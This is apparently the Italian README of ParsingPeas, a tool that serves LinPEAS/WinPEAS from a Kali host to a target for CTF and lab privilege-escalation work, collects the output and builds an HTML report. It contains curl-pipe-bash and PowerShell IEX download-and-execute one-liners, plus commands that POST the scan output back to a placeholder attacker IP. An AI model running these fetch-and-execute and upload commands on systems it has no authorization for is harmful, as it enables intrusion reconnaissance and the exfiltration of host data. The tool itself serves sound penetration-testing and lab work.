
Parser HTML per l'output di PEAS con funzionalità aggiuntive
Raccolta automatizzata di PEASS + un report HTML pulito e portatile per lavoro di escalation dei privilegi in CTF e laboratori.
Esegui un comando sul target. ParsingPeas recupera LinPEAS/WinPEAS dal tuo host Kali, esegue la scansione, rimanda indietro l'output e lo trasforma in un singolo report HTML autonomo che puoi leggere, cercare, vagliare e conservare — niente trasferimento manuale di file, niente internet sul target.
Riepilogo report — sezioni raggruppate per le categorie di LinPEAS, con pallini di rilevamento e una barra dei risultati:

Solo risultati — un clic filtra il report e la barra laterale mostrando solo le sezioni con elementi critici/alti:

Output terminale completo — la scansione completa, fedelmente colorata; ricercabile con Ctrl-F:

L'output grezzo di PEASS è un muro di testo scorrevole nel terminale che scompare nel momento in cui la tua shell muore. ParsingPeas:
scp, niente hosting di linpeas da te,
niente copia-incolla dell'output di nuovo su Kali..html autonomo che puoi
copiare dalla macchina, archiviare o aprire offline facendo doppio clic.È presentazione + logistica, non un motore di exploit: conserva fedelmente la colorazione e i risultati di PEASS invece di cercare di interpretarli.
file://.N critici / N alti che saltano tra le sezioni
contrassegnate, più una legenda dei colori.bash) e WinPEAS (PowerShell).git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh # scarica LinPEAS + WinPEAS in scripts/
pip3 install -r requirements.txt
python3 receiver.py # serve su http://0.0.0.0:8005
Lascia receiver.py in esecuzione. Trova l'IP tramite cui il target ti raggiungerà:
tun0 — ip -4 addr show tun0Linux/Unix (usa curl, fallback su wget):
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash
Windows (PowerShell / reverse shell):
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"
Scegli la riga singola corrispondente al sistema operativo del target — Linux serve LinPEAS, Windows serve WinPEAS.
I report vengono generati sul tuo host Kali in ./reports/. Puoi:
http://YOUR_KALI_IP:8005 e fare clic su un report, oppurexdg-open ./reports/report_<host>_<timestamp>.html
Copia quel singolo .html dove vuoi; funziona da solo.
Target → scarica il wrapper da Kali → esegue PEASS → invia output tramite POST → Kali analizza → report HTML autonomo
Il target non ha mai bisogno di internet — il wrapper e i binari di PEASS sono tutti serviti dal tuo host.
Se la riga singola fallisce, fallo manualmente.
Linux:
# Sul target
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Invia indietro
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
--data-binary @/tmp/out.txt http://KALI_IP:8005/upload
Windows (PowerShell):
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
-Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
-InFile $env:TEMP\out.txt
Analizza un dump PEASS che hai già:
python3 parser.py /path/to/peas_output.txt # scrive un report HTML in ./reports/
Modifica l'inizio di receiver.py:
curl http://KALI_IP:8005/health per verificare
la connettività; apri il firewall con sudo ufw allow 8005/tcp./get-linpeas? Esegui ./setup.sh per recuperare i binari PEASS.⚠️ Solo per test di penetrazione autorizzati, CTF e uso in laboratorio.
Costruito su PEASS-ng di @carlospolop. ParsingPeas si limita a raccogliere e presentare il suo output.
Licenza MIT · Contributi benvenuti
| Impostazione | Default | Note |
|---|
| Porta | 8005 | cambia la riga app.run(... port=...) |
OUTPUT_DIR | ./received_outputs | scansioni grezze caricate |
REPORTS_DIR | ./reports | report HTML generati |
SCRIPTS_DIR | ./scripts | binari LinPEAS/WinPEAS |
MAX_UPLOAD_SIZE | 10 MB | applicato — upload più grandi ottengono HTTP 413 |